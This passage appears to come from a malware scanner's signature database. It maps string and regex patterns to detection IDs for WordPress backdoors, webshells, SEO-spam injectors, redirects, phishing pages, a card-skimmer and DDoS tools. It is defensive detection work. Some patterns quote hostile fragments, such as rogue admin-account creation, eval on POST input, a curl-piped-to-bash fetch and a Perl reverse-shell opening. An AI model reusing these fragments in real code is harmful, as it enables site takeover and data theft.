		'../wp-blog-header.php");' => array(STR_CLEARFILE, 'php.backdoor.wpuser.001', NULL),
	),

	'administrator' => array(STR_TRIGGER,

		'require_once(realpath($_SERVER["DOCUMENT_ROOT"]) . "/wp-load.php");' => array(STR_TRIGGER,
			'function add_admin_account() {' => array(STR_TRIGGER,
				'$user_id = wp_create_user($user, $pass, $email);' => array(STR_CLEARFILE, 'php.backdoor.wp_adminadd.032', NULL),
			),
		),

		'add_action' => array(STR_TRIGGER,
			'add_action\([^\)]+\);[\s]*function [\w]+\(\)[\s]*\{[\s]*\$username[^;]+;[\s]*\$password[^;]+;[\s]*\$email_address[^;]+;[\s]*if[\s]*\([\s]*isset[\s]*\([\s]*\$username[^\{]+\{[\s]*if[\s]*\([\s]*![\s]*username_exists[^\{]+\{[\s]*\$user_id[\s]*=[\s]*wp_create_user[^\}]+\$wp_user_object->set_role\([\s]*.administrator' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.wp_adminadd.023', 'add_action\([^\)]+\);[\s]*function [\w]+\(\)[\s]*\{[\s]*\$username[^;]+;[\s]*\$password[^;]+;[\s]*\$email_address[^;]+;[\s]*if[\s]*\([\s]*isset[\s]*\([\s]*\$username[^\{]+\{[\s]*if[\s]*\([\s]*![\s]*username_exists[^\{]+\{[\s]*\$user_id[\s]*=[\s]*wp_create_user[^\}]+\$wp_user_object->set_role\([\s]*.administrator[^;]+;[\s\}]+'),
		),

		'\$[\w]+[\s]*=[\s]*wp_create_user\(.[\w]+.,[\s]*.[\w]+.,[\s]*.[^;]+\);[\s]*\$[\w]+[\s]*=[\s]*new[\s]*WP_User\(\$[\w]+\);[\s]*\$[\w]+[\s]*->[\s]*set_role\(.administrator.\);' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.wp_adminadd.025', '\$[\w]+[\s]*=[\s]*wp_create_user\(.[\w]+.,[\s]*.[\w]+.,[\s]*.[^;]+\);[\s]*\$[\w]+[\s]*=[\s]*new[\s]*WP_User\(\$[\w]+\);[\s]*\$[\w]+[\s]*->[\s]*set_role\(.administrator.\);'),
	),

	'$user_id = wp_create_user( $' => array(STR_TRIGGER,
		'!email_exists\(\$[\w]+\)[\s]*\)[\s]*\{[\s]*[^\(]*\$user_id[\s]*=[\s]*wp_create_user[\s]*\([\s]*\$[\w]+[^\)]+\);[\s]*if[\s]*\([\s]*is_int\([\s]*\$user_id\)[\s]*\)[\s]*\{[\s]*\$wp_user_object[\s]*=[\s]*new WP_User\(\$user_id\);[\s]*\$wp_user_object->set_role\([\s]*.administrator.[\s]*\);[\s]*echo[^;]+;([\s}]+else[\s]*\{[\s]*echo[^;]+;){3}' => array(REX_CLEARFILE, 'php.backdoor.wp_adminadd.019', NULL),
		'$user_id = wp_create_user( $_GET[\'name\'], $_GET[\'secret\'] );' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.wp_adminadd.029', 'add_action\([^;]+\);[\s]*function [\w]+\(\)[\s]*\{[\s]*if[\s]*\([\s]*md5[\s]*\([\s]*\$_GET\[.hash[^\{]+\{[\s]*require[^;]+\);[\s]*if[\s]*\([\s]*!username_exists\([\s]*\$_GET[^\}]+[\s\}]+'),
		'hide_plugins($plugins){unset(' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.wp_adminadd.030', 'add_action\([\s]*.[\w]+.,[\s]*.[\w]+.[\s]*\);[\s]*if\([\s]*\$_GET\[.[\w]+.\]!==.[\w]+.[\s]*\)[\s]*\{function[\s]*[\w]+\([\s]*\$[\w]+[\s]*\)[\s]*\{[\s]*unset\([\s]*\$[\w]+\[[^>]+\);[\s]*\$wp_user_object->set_role\([\s]*.administrator.[\s]*\);[\s]*\}[\s]*\}[\s]*\}[\s]*\}'),
	),

	'echo' => array(STR_TRIGGER,
		'echo $siteurl->option_value.\'|\'.$user_loginv' => array(STR_CLEARFILE, 'php.backdoor.wp_adminadd.014', NULL),
	),

	'echo $user->id' => array(STR_TRIGGER,
		'self::EXTERNAL_DIRECTORY . $this->id,' => array(STR_CLEARFILE, 'php.backdoor.adduser.004', NULL),
	),

	'/wp-content/themes/' => array(STR_PATH_TRIGGER,
		'(\$\w+)\s*=\s*wp_create_user\(\s*\'\s*\S+\s*\'\s*,\s*\'\s*\S+\s*\'\s*,\s*\'[^\@]+\@\w+\.[^\']+\'\s*\)\s*;\s*(\$\w+)\s*=\s*new\s*WP_User\(\s*\1\s*\)\s*;(\s*\2\s*->\s*remove_role\(\s*\'\s*\w+\s*\'\s*\)\s*;)?\s*\2\s*->\s*(?:set|add)_role\(\s*\'\s*administrator\s*\'\s*\)\s*;' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.wp_adminadd.020', '(\$\w+)\s*=\s*wp_create_user\(\s*\'\s*\S+\s*\'\s*,\s*\'\s*\S+\s*\'\s*,\s*\'[^\@]+\@\w+\.[^\']+\'\s*\)\s*;\s*(\$\w+)\s*=\s*new\s*WP_User\(\s*\1\s*\)\s*;(\s*\2\s*->\s*remove_role\(\s*\'\s*\w+\s*\'\s*\)\s*;)?\s*\2\s*->\s*(?:set|add)_role\(\s*\'\s*administrator\s*\'\s*\)\s*;'),
	),
),

'define' => array(STR_TRIGGER,

	'efine(\'SECURE_AUTH_SALT\',' => array(STR_TRIGGER,
		'/** The name of the database for WordPress */' => array(STR_TRIGGER,

			'require' => array(STR_TRIGGER,
				'require(_once)?\([^;]+wp-(includes|admin)[^;]+\);' => array(REX_CLEAR_LINEMATCH, 'php.malware.require_once-injection.005', '@?require(_once)?\([^;]+wp-(includes|admin)[^;]+\);'),
			),

			'include' => array(STR_TRIGGER,
				'include(_once)?\([^;]+wp-(includes|admin)[^;]+\);' => array(REX_CLEAR_LINEMATCH, 'php.malware.include.046', '@?include(_once)?\([^;]+wp-(includes|admin)[^;]+\);'),
			),

			'eval($_POST[' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.103', 'eval\(\$_POST\[[^;]+\);'),
		),
	),

	'define(\'vpsp_pwd\',' => array(STR_CHAIN_TRIGGER,
		'define(\'vpsp_version' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.vpsp.001', 'define\(.vpsp_version\',[\s]*.[\d]+[^;]+\);[\s]*define\(.vpsp_pwd[^\?]+[^\<]+\$i[\s]*<[^?]+return[\s]*\$[\w]+;[\s]*\}[\s]*'),
		'$GLOBALS[\'vpsp_pe\'] = array' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.vpsp.001.02', '\$GLOBALS\[\'vpsp_pe\'\] = array\([\s]*[\d]+,[\s]*[\d]+,[^;]+\);[\s]*'),
		'(isset($_COOKIE[\'proxy\']))' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.vpsp.001.03', 'if[\s]*\(isset\(\$_COOKIE\[.proxy.\]\)\)[\s]*\{[\s]*'),
	),

	'* Front to the WordPress application.' => array(STR_TRIGGER,

		'<a href=' => array(STR_TRIGGER,
			'</a>&nbsp' => array(STR_CLEAR_LINEMATCH, 'html.spam-seo.spam-links.014', '<\a*a\s*href=[\'"]https?:\/\/[\w\.\/-]+[^<]+<\/a>(?:\s*\&nbsp;)?'),
		),

		'$_GET[\'type\']==\'login\')' => array(STR_CLEAR_MULTIMATCH, 'php.redirect.header_location.032', 'if\(\$_GET\[.type.\][\s]*==[\s]*.login.\)[\s]*\{[\s]*((?i)header\(.location:)[^;]+\);[\s]*\}'),
	),

	'require_once dirname(__FILE__) . \'/wp-' => array(STR_TRIGGER,
			'new KClickClient(\'http' => array(STR_CLEAR_MULTIMATCH, 'php.malware.require_once-injection.007', 'require_once dirname\(__FILE__\)\s+\.\s+\'\/wp-(admin|includes)[^;]*;\s+\$\w+\s+=\s+new.KClickClient\(\'http([^;]*;\s+){1,3}\$\w+\-\>execute\(\);'),
	),

	'$(this).find( "input, textarea, select' => array(STR_TRIGGER,
		'$validateIds = $(\'#co-payment-form, #opc-address-form-billing' => array(STR_CLEARFILE, 'js.malware.magento-cc-stealer.030', NULL),
	),

	'$GLOBALS["\160\141\163\163"]' => array(STR_TRIGGER,
		'"\145\166\141\154".\'("?>' => array(STR_CLEARFILE, 'php.backdoor.webshell.231', NULL),
	),

	'define(\'CONFIG_FILE\', \'/images/config.db\');' => array(STR_CLEARFILE, 'php.spam-seo.injector.074', NULL),
	'if (!defined(\'frmDs\')){' => array(STR_CLEARFILE, 'php.spam-seo.frmDs-injector.001', NULL),
	'define(\'__DOMAIN_NAME__\', \'megatechnologies.com\');' => array(STR_CLEARFILE, 'php.spam-seo.burst.001', NULL),
	'define(\'ADMIN_REDIR_URL\',' => array(STR_CLEARFILE, 'php.spam-seo.redirect.005', NULL),
	'define(\'pixyletu' => array(STR_CLEARFILE, 'php.spam-seo.generic.021', NULL),
	'06b140be12e80b1fc08ad42611caa64a3e56ee163d3c8a088b' => array(STR_CLEARFILE, 'php.backdoor.joomla_gen.00', NULL),
	'define(\'vpsp_enc_key\',' => array(STR_CLEARFILE, 'php.backdoor.vpsp.001.002', NULL),
	'/*EngineWork*/if(!defined(' => array(STR_CLEAR_LINEMATCH, 'php.malware.injector.021',  '..EngineWork..if..defined.[^;]+ob_start..;.define[^\}]+error_reporting.0.;echo\s*base64_decode[^;]+\);\}..EngineWork..'),
	'wp_sum_check($debugger_binary_x86_x64)' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.133', NULL),
),

'window.location' => array(STR_TRIGGER,
	
	'document.cookie' => array(STR_TRIGGER,
		'authtoken=1; path=/;expires=' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.redirect.054', '<script>\s*if\(document.cookie.indexOf\("_mauthtoken"\)[^\}]+;[^|]+.userAgent[^>]+\.vendor..window.opera[^\']+\'http:[^\}]+;\}\s*<.script>'),
		'PayPal Valid Email Checker' => array(STR_CLEARFILE, 'js.phishing.mailer.001', NULL),
	),

	'<title></title>' => array(STR_TRIGGER,
		'setTimeout(onTimer,' => array(STR_TRIGGER,
			'<td align=center><h1><i><font color="grey">' => array(STR_TRIGGER,
				'window.location.href = \'http' => array(STR_CLEARFILE, 'php.spam-seo.redirect.085', NULL),
			),
		),
	),

	'window.location="http://my.mail.ru/"' => array(STR_TRIGGER,
		'<?if($_SERVER[\'HTTP_USER_AGENT\'] ==' => array(STR_TRIGGER,
			'<?}else{?>' => array(STR_CLEARFILE, 'php.spam-seo.redirect.039', NULL),
		),
	),

	'adsbygoogle.js\');adsScript.' => array(STR_TRIGGER,
		'{init(options)})})({url:\'http://' => array(STR_CLEAR_LINEMATCH, 'js.malware.unwanted-ads.001', 'function\(\).var a,b,c,d,e,f,g,h,i,j;b=window.device[^\#]+#&\]"\+name[^:]+\{url:.http:..(\d+\.){3}\d+\/[^\.\}]+\.php.\}\);'),
	),

	'header("Location: http://google.com"); exit();' => array(STR_TRIGGER,
		'$write = write_bad($current_url, $parser_url .' => array(STR_CLEARFILE, 'php.spam-seo.injector.164', NULL),
	),

	'window.location = "./rand.php";' => array(STR_TRIGGER,
		'device.match(/J2ME/i)|| device.match(/BlackBerry/i)|| device.match(/iPhone|iPad|iPod/i)' => array(STR_CLEARFILE, 'php.phishing.redirect.001', NULL),
	),

	'function myclick()' => array(STR_TRIGGER,
		'var sUserAgent = navigator.userAgent.toLowerCase();' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.injector.050', 'function browserRedirect\(\)[\s]*\{[\s]*var sUserAgent[\s]*=[\s]*navigator.userAgent.toLowerCase\(\);[^>]+myclick\(\);'),
	),

	'redirect_counter_bots.txt","a+");' => array(STR_TRIGGER,
		'fwrite($fp,"\r\n"."(".date(\'D M j G:i:s T Y\').")".$_SERVER[\'HTTP_USER_AGENT' => array(STR_CLEARFILE, 'php.spam-seo.redirect.080', NULL),
	),

	'/index/?' => array(STR_TRIGGER,
		'window\.location\.replace\(.http:..[^\?]+\/index\/\?[\d]{10}' => array(REX_CLEAR_LINEMATCH, 'js.spam-seo.crypper.001', 'window\.location\.replace\(.http:..[^\?]+\/index\/\?[\d]{10,}.\);?'),
	),

	'$fake_script = gen_rnd_str(' => array(STR_CLEARFILE, 'php.spam-seo.redirect.059', NULL),
	'if(patrn.exec(rUrl))window.location.href=toUrl;' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.redirect.013', '<script>[\\s]*var toUrl="http:..";[\\s]*var rUrl = document.referrer;[\\s]*var patrn=[^;]+;[\\s]*toUrl\\+=[^;]+;[\\s]*toUrl.="";[\\s]*if.patrn.exec.rUrl..window.location.href=toUrl;[\\s]*(patrn=[^;]+;[\\s]*if.patrn.exec.rUrl..window.location.href=toUrl;[\\s]*)+<.script>'),
	'section=cardmembersvcs/loginlogout' => array(STR_CLEARFILE, 'php.phishing.discover.001', NULL),
	'window.opener.location.replace(\'$login_scam_page_link' => array(STR_CLEARFILE, 'php.spam-seo.redirect.041', NULL),
	'alert(\'Install downloaded porn player for watching videos!' => array(STR_CLEARFILE, 'php.spam-seo.pornspam.007', NULL),
	'window.location="data:text/html;charset=utf-8;base64,PCFET' => array(STR_CLEARFILE, 'js.redirect.window_location.009', NULL),
	'window.location="mail.htm?cmd=' => array(STR_CLEARFILE, 'js.redirect.window_location.010', NULL),
	'window.location.href="https://login.microsoftonline.com/common/oauth2/"' => array(STR_CLEARFILE, 'js.phishing.microsoft.002', NULL),
),

'dir' => array(STR_TRIGGER,

	'echo$' => array(STR_TRIGGER,
		'echo$block;file_put_contents($page_file' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.block_injector.001', 'if[\\s]*.stripos.._SERVER..HTTP_USER_AGENT..,.googlebot"...stripos[^;]+\\$upload_dir=wp_upload_dir..;[^;]+;[\\s]*.domain=str_replace[^#]+##[^#]+##".\\$page.".".\\$block."..",FILE_APPEND.;}}'), //modified by PG to support more variants
		'echo$content;die();}}}' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.block_injector.001.02', '\\$upload_dir[^;]+;[\\s]*if.isset.._GET[^|]+\\|"....entry=explode."\\|"[^|]+\\|[^;]+FILE_APPEND.;[\\s]*echo\\$content;die..;}}}'), 
	),

	'Redirect 301 / http' => array(STR_TRIGGER,
		'Redirect 301 / http://loading-loading' => array(STR_CLEAR_LINEMATCH, 'htaccess.spam-seo.redirect.008', 'Redirect 301 . http:..loading-loading[^\\.]+\\.ml.'),
	),

	'$rcakey = \'rca.1.1.' => array(STR_TRIGGER,
		'$maxfoto' => array(STR_CLEARFILE, 'php.spam-seo.Autodor_Wmsn.005', NULL),
	),

	'\'.$dir_cloak.$url_part.$ext_file,false,$context);' => array(STR_CLEARFILE, 'php.spam-seo.injector.045', NULL),
	'recursive_remove_directory($_SERVER[\'DOCUMENT_ROOT\'].$proxyfile."cache",true);' => array(STR_CLEARFILE, 'php.spam-seo.injector.096', NULL),
	'$dir = \'wp-maps\'' => array(STR_CLEARFILE, 'php.spam-seo.injector.112', NULL),
	'check(dirname($_SERVER[\'DOCUMENT_ROOT\'] . \'/RND\') , $dirs);' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.003', NULL),
	'$Remote_directory = $Remote_server."/d.php"."?type=index.php&host=".$host_name."&directory=".$Branch;' => array(STR_CLEARFILE, 'php.spam-seo.doorway_downloader.004', NULL),
	'redir = urls[rand(0, urls.length-1)]+rand(11,999);' => array(STR_CLEARFILE, 'js.spam-seo.random-redirect.001', NULL),
	'$art .= "<li><a href=\'".$dir.MyRandc(5)."/".replacex($t[0]).".html\'  title=\'".$title_txt[$value]."\'>".$t[0]."</a></li>";' => array(STR_CLEARFILE, 'php.spam-seo.injector.001.013', NULL),
	'infile1 = mydir&"index.html"' => array(STR_CLEARFILE, 'asp.spam-seo.injector.010', NULL),
	'redir = urls[rand(0, urls.length-1)]' => array(STR_CLEARFILE, 'js.redirect.window_location.002', NULL),
	'function Spider_RAND($length)' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.004', NULL),
	'recurDir(\'.\',0777);' => array(STR_CLEARFILE, 'php.hacktool.perm-folders.002', NULL),
	'if (is_dir($_POST[\'directory\']) && !is_dir_empty($_POST[\'directory\']))' => array(STR_CLEARFILE, 'php.hacktool.ssv3.001', NULL, 1),
	'rename ($inn.".php.suspected", $inn.".php");' => array(STR_CLEARFILE, 'php.malware.component.010', NULL),
),

'bot' => array(STR_TRIGGER,

	'$_SERVER[\'HTTP_USER_AGENT\']' => array(STR_TRIGGER,

		'(strpos($tmp,' => array(STR_TRIGGER,

			'if((strpos($tmp, \'bot' => array(STR_TRIGGER,
				'$tmp = "?" . strtolower($_SERVER[\'HTTP_USER_AGENT\']);' => array(STR_CLEARFILE, 'php.spam-seo.redirect.124', NULL),
			),

			'location:http' => array(STR_CLEARFILE, 'php.spam-seo.redirect.123', NULL),
		),

		'<?php endif; ?>' => array(STR_TRIGGER,
			'<?php if(preg_match(\'/robo|bot|crawl|spider|slurp|scooter/i\',$_SERVER[\'HTTP_USER_AGENT\']) and !preg_match' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.324', '<\?php if\(preg_match\(..robo.bot[^\)]+\) and !preg_match[^:]+:[\s]*\?>[\s]*<a href[^\?]+<\?php endif; \?>'),
		),
	),

	'HTTP_USER_AGENT' => array(STR_TRIGGER,

		'<a href' => array(STR_TRIGGER,
			'if (!empty($agent)) {' => array(STR_TRIGGER,
				'if (strpos($' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.hidden-links.006', 'function[\s]*[\w]+\(\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*strtolower\(\$_SERVER\[.HTTP_USER_AGENT.\]\);[\s]*if[\s]*\(!empty\(\$[\w]+\)\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*array\([^\{]+\{[\s]*\$[\w]+[\s]*=[\s]*strtolower\(\$[\w]+\);[^\}]+return[\s]*true;[\s]*\}[\s]*\}[\s]*\}[\s]*else[\s]*\{[\s]*return[\s]*false;[\s]*\}[\s]*\}[\s]*if\([\w]+\(\)\)[\s]*\{[\s]*echo[^\}]+\}[\s]*else[\s]*\{[^\}]+\}'),
			),
		),

		'parent.location.href' => array(STR_TRIGGER,
			'bot|' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.generic.033', 'if\s*?\(\s*?@?eregi\s*?\(\s*?["\'](?:\|?(?:googlebot|slurp|msnbot|bot)){2,}?(?:[^\{]+?\{){3}\s*?parent\.location\.href\s*?=(?:[^\}]+?\}){2}'),
		),
	),

	'veribot()' => array(STR_TRIGGER,
		'if (veribot' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.veribot.001.001', 'if\s*\(veribot\(\)\s*\)[^;]+echo[^;]+<.a>.;'), 
		'function veribot()' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.veribot.001.002', 'function veribot\(\)[^}]+return\s*\$go;[^\}]+\}'),
	),

	'<action type="Rewrite" url="bot.asp"' => array(STR_TRIGGER,
		'cript" stopProcessing="true">' => array(STR_TRIGGER,
			'<add input="{HTTP_USER_AGENT}" pattern="Googlebot' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.009', '<rule name=[^>]+cript"[\\s]*stopProcessing="true">[\\s]*<match url[^>]+>[\\s]*<conditions[^>]+>[\\s]*<add input=..HTTP_USER_AGENT.. pattern=.Googlebot[^\\.]+<action type=.Rewrite" url="bot.[^>]+>[\\s]*<.rule>'),
		),
	),

	'$ksite = !empty($_GET[' => array(STR_TRIGGER,
		'$content = file_get_contents($fromsite' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.115', '\$referer[\s]*=[\s]*\$_SERVER\[.HTTP_REFERER..;[\s]*\$user_agent[\s]*=[\s]*\$_SERVER\[.HTTP_USER_AGENT.\];[\s]*\$tmp[\s]*=[\s]*strtolower\(\$_SERVER[^@]+\$fromsite[\s]*=[\s]*\$val;[^@]+\{[\s]*header\(.Location:[^;]+\);[\s]*(exit;[\s]*)?\}|\$tmp[\s]*=[\s]*strtolower\(\$_SERVER[^@]+\$fromsite[\s]*=[\s]*\$val;[^@]+\{[\s]*header\(.Location:[^;]+\);[\s]*(exit;[\s]*)?\}'),
	),

	'strtolower($_SERVER[\'HTTP_USER_AGENT\']);' => array(STR_TRIGGER,
		'if((strpos($tmp, \'bot\') == true)){' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.hidden-div.012', '\$[\w]+[\s]*=[\s]*[^;]+strtolower\(\$_SERVER\[.HTTP_USER_AGENT.\]\);[\s]*if[\s]*\([\s]*\(strpos\(\$[\w]+,[^\{]+true[\s]*\)[\s]*\)[\s]*\{[\s]*echo[^\}]+;\}'),
	),

	'$BotredirectUrl = isset($csGlobal[\'botRedirectUrl\']) ? $csGlobal[\'botRedirectUrl\'] : null;' => array(STR_CLEARFILE, 'php.spam-seo.injector.039', NULL),
	'$getbot = Getbot();' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.redirect.030', '\\$getbot = Getbot\\(\\);[\\s]*\\$refer = \\$_SERVER..HTTP_REFERER..;[\\s]*if.\\$getbot[^?]+return \\$thisbot;[\\s]*}'),
	'Check(\'wp-login.php\', "\'antibot_ajax' => array(STR_CLEARFILE, 'php.spam-seo.wp-core.002', NULL),
	'echo \'<div id="Related">' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.related_injector.001', '(\$\w+) = "\?\" \. strtolower.._SERVER..HTTP_USER_AGENT...;\s*if..strpos.\1, .bot.. == true...\s*echo .<div id=.Related.>\s*<ul>[^\}]+<.ul>\s*<.div>.;\s*\}'), 
	'bOdWQkNnHHvxX0TqPhfTHt9kdnFuZdi8c464HpzXzhalY7iW3IwWnA57YJrelK8XFrYynFRnGombku7d8wwaZWtrECRRwMPvMoyffFZNejQnz01I92DurhRRRWpYUUUUAFFFe1' => array(STR_CLEARFILE, 'php.spam-seo.redirect.013', NULL),
	'include \'check_is_bot.php\';if(empty($is_bot)){echo' => array(STR_CLEARFILE, 'php.spam-seo.replicas.003', NULL),
	'nama:"Cvar1984.phtml"' => array(STR_CLEARFILE, 'php.malware.generic.073', NULL),
),

'url' => array(STR_TRIGGER,

	'class SAPE_base' => array(STR_TRIGGER,
		'var $_server_list = array(\'dispens' => array(STR_CLEARFILE, 'php.hacktool.SAPE.001', NULL),
		'array(\'dispenser-01.sape.ru' => array(STR_CLEARFILE, 'php.hacktool.SAPE.001.04', NULL),
	),

	'mt_rand(0,count($' => array(STR_TRIGGER,
		'urls)' => array(STR_TRIGGER,
			'[$n]' => array(STR_TRIGGER,
				'<\?php[\s]*(\$[\w]+[\s]*=[\s]*strpos\(\$_SERVER\[.HTTP_USER_AGENT[^;]+;[\s]*)?\$[\w]*urls[\s]*=[\s]*array[\s]*\([\s]*.http' => array(REX_CLEARFILE, 'php.spam-seo.redirect.002', NULL),
			),
		),
	),

	'=urldecode(' => array(STR_TRIGGER,
		'Jy4kTzAwTzBPKCRPME9PMDA' => array(STR_TRIGGER,
			'};eval(${${"' => array(STR_CLEARFILE, 'php.hacktool.packer.008', NULL),
		),
	),

	'.js > /tmp/php-' => array(STR_TRIGGER,
		'checks=$(ps aux | grep php-' => array(STR_TRIGGER,
			'rm -rf /tmp/.a /tmp/start_' => array(STR_CLEAR_MULTIMATCH, 'sh.backdoor.uploader.003', 'checks=\$\(ps aux \| grep php-[\w]+ \| grep -v grep \| grep tmp\);[\s]*if[\s]*\[[\s]*"\$checks[^;]+;[\s]*then[\s]*rm -rf .tmp.\.a .tmp.start[^&]+null 2>&1[\s]*&[\s]*Fi'),
		),
	),

	'| bash -sh' => array(STR_TRIGGER,
		'$handle = popen("curl -s http' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.curl.014', '\$handle = popen\("curl -s http[^;]+\| bash[^;]+;'),
	),

	'urllib.urlencode(login_form_seq)' => array(STR_TRIGGER,
		'"/admin/", login_form_data).read()' => array(STR_CLEARFILE, 'py.hacktool.bruteforce.001', NULL),
	),

	'background: url(\'http://i41.tinypic.com/ibkmd5.png\') repeat scroll 0 0 #' => array(STR_CLEARFILE, 'php.backdoor.file_get_contents.010.02', NULL),
	'$url = "www.randomwebsite.com/cgi-bin/random.pl?$url";' => array(STR_CLEARFILE, 'php.spam-seo.redirect.009', NULL),
	'$numAds = count($postDefWPTheme);' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.101', '\$postDefWPTheme[\s]*=[\s]*array\(.<div[^$]+\$numAds[^\}]+\$urlIndex..;[\s]*\}'),
	'$URL = $urls[rand(0, count($urls) - 1)].rand(11, 999);' => array(STR_CLEARFILE, 'php.spam-seo.random-redirect.001', NULL),
	'content=ReplaceReg(content,"<a [.>]*href="""&purl&' => array(STR_CLEARFILE, 'asp.spam-seo.injector.011', NULL),
	'<a href="<?php echo esc_url( __( \'http://www.wpfree.ru/' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.theme_link_spam.003', '<a href="<\?php echo esc_url\( __\( \'http:\/\/www\.wpfree\.ru\/\'[^;]+?; \?>"><\?php printf[^;]+?; \?><\/a>'),
	'<meta http-equiv[\s]*=[\s]*.refresh.[\s]*content[\s]*=[\s]*.[\d]+;[\s]*url[\s]*=[\s]*<\?php[\s]*echo[\s]*\$target_url;[\s]*\?>' => array(REX_CLEARFILE, 'php.spam-seo.redirect.002.02', NULL),
	'$rnd=rand(0,count($urls)-1);' => array(STR_CLEARFILE, 'php.spam-seo.redirect.002.03', NULL),
),

'python' => array(STR_TRIGGER,

	'shell' => array(STR_TRIGGER,

		'generate_payload' => array(STR_TRIGGER,
			'eval(' => array(STR_TRIGGER,
				'\x' => array(STR_TRIGGER,
					'JDatabaseDriver' => array(STR_CLEARFILE, 'py.hacktool.joomla_rce_exploit.001', NULL),
				),
			),
		),

		'(.)(.) [ChickenLittle Shell by Zep] (.)(.)' => array(STR_CLEARFILE, 'py.backdoor.ChickenLittle-shell.001', NULL),
		'ython connect-back door"' => array(STR_CLEARFILE,'py.backdoor.generic.001', NULL),
		'print "ython connect-back door"' => array(STR_CLEARFILE, 'py.backdoor.connect_back.001', NULL),
		'clear = "\x1b[0m"' => array(STR_CLEARFILE, 'py.backdoor.joomra.001', NULL),
		'elseif (is_resource($f = @popen' => array(STR_CLEARFILE, 'php.backdoor.injector.131', NULL),
	),

	'urllib' => array(STR_TRIGGER,

		'print exploit(' => array(STR_TRIGGER,
			'tbladmins' => array(STR_CLEARFILE, 'py.hacktool.WHMCS_exploit.001', NULL),
		),
		
		'secr7 = re.search (r"(mosConfig_password = \')' => array(STR_CLEARFILE, 'py.hacktool.password_retriever.001', NULL),
		'$(echo -n "curl=$Ecurl|wget=$Ewget|python=$Epy|perl=$Eperl|dir=$DIR" | base64)' => array(STR_CLEARFILE, 'sh.backdoor.dropper.002', NULL),
	),

	'if(preg_match(\'/\' . implode(' => array(STR_TRIGGER,
		'404 Not Found' => array(STR_TRIGGER,
			'array("Googlebot' => array(STR_CLEARFILE, 'php.backdoor.generic.085', NULL),
		),
	),

	'import http.client' => array(STR_TRIGGER,
		'GoldenEye(object)' => array(STR_CLEARFILE, 'py.hacktool.ddos.004', NULL),
	),

	'&name=r0ot.py' => array(STR_CLEARFILE, 'py.backdoor.dropper.001', NULL), 
	'version = "0.1 [py]"' => array(STR_CLEARFILE, 'py.hacktool.webshell.001', NULL),
	'payload = """perl -e \'use Socket;$i="%s";$p=%s;socket(S,PF_INET' => array(STR_CLEARFILE, 'py.backdoor.webshell.001', NULL),
	'Private DDoS Tool' => array(STR_CLEARFILE, 'py.hacktool.ddos.002', NULL),
	'open(\'xmlrpc_list.txt\'' => array(STR_CLEARFILE, 'py.hacktool.ddos.003', NULL),
	'./torshammer.py' =>array(STR_CLEARFILE, 'py.hacktool.ddos.005', 'NULL'),
),

'<a href=' => array(STR_TRIGGER,

	'.xyz" target="_blank" style="color: ' => array(STR_TRIGGER,
		'movies2watch.xyz' => array(STR_TRIGGER,
			'<iframe src="http://movies2watch.xyz' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.movies2watch_xyz.002', '<iframe src="http:..movies2watch.xyz[^<]+?<.iframe>'),
			'<a href="http://movies2watch.xyz" ' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.movies2watch_xyz.001', '<a href="http:..movies2watch.xyz[^<]+?<.a>'),
		),
	),

	'<title>&#' => array(STR_TRIGGER,
		'Copyright 2015 Crockett & Jones. All rights reserved.' => array(STR_CLEARFILE, 'html.spam-seo.japanese-spam.005', NULL),
		'<title>&#67;&#104;&#97;&#115;&#101;&#32;&#66;&#97;&#110;&#107' => array(STR_CLEARFILE, 'php.phishing.chasebank.001', NULL),
	),

	'<title>  Ã¦Å“ÂªÃ¦â€°Â¾Ã¥Ë†Â°Ã©Â¡ÂµÃ©ÂÂ¢ - Ã¥ÂÂ¤Ã¦Å“Ë†' => array(STR_TRIGGER,
		'<title>404 Not Found' => array(STR_CLEARFILE, 'html.spam-seo.japanese-spam.002', NULL),
	),

	'<?php Echo ' => array(STR_TRIGGER,
		'<footer><!-- #colophon --></footer>" ?>' => array(STR_CLEARFILE, 'php.spam-seo.injector.044.03', NULL),
	),

	'>buy' => array(STR_TRIGGER,
		'<p hidden><a href="' => array(STR_CLEAR_LINEMATCH, 'html.spam-seo.spam-links.004', '<p hidden>(?:<a href="[^\>]+>[^\<]+<.a>\s*)+<\/p>'),
	),

	'<div' => array(STR_TRIGGER,
		'divHrefB' => array(STR_CLEAR_MULTIMATCH, 'html.spam-seo.spam-links.015', '<div[\s]*name=.divHrefB[^>]+hidden;.>[\s]*(<a href=.http[^<]+?<.a>[\s]*)+<.div>'),
	),

	'#gradcatalog">Previous Catalog</a> | <a href="#">Catalog Home</a> | <a href="#gradcatalog">Graduate Students' => array(STR_CLEARFILE, 'html.spam-seo.generic.005', NULL),
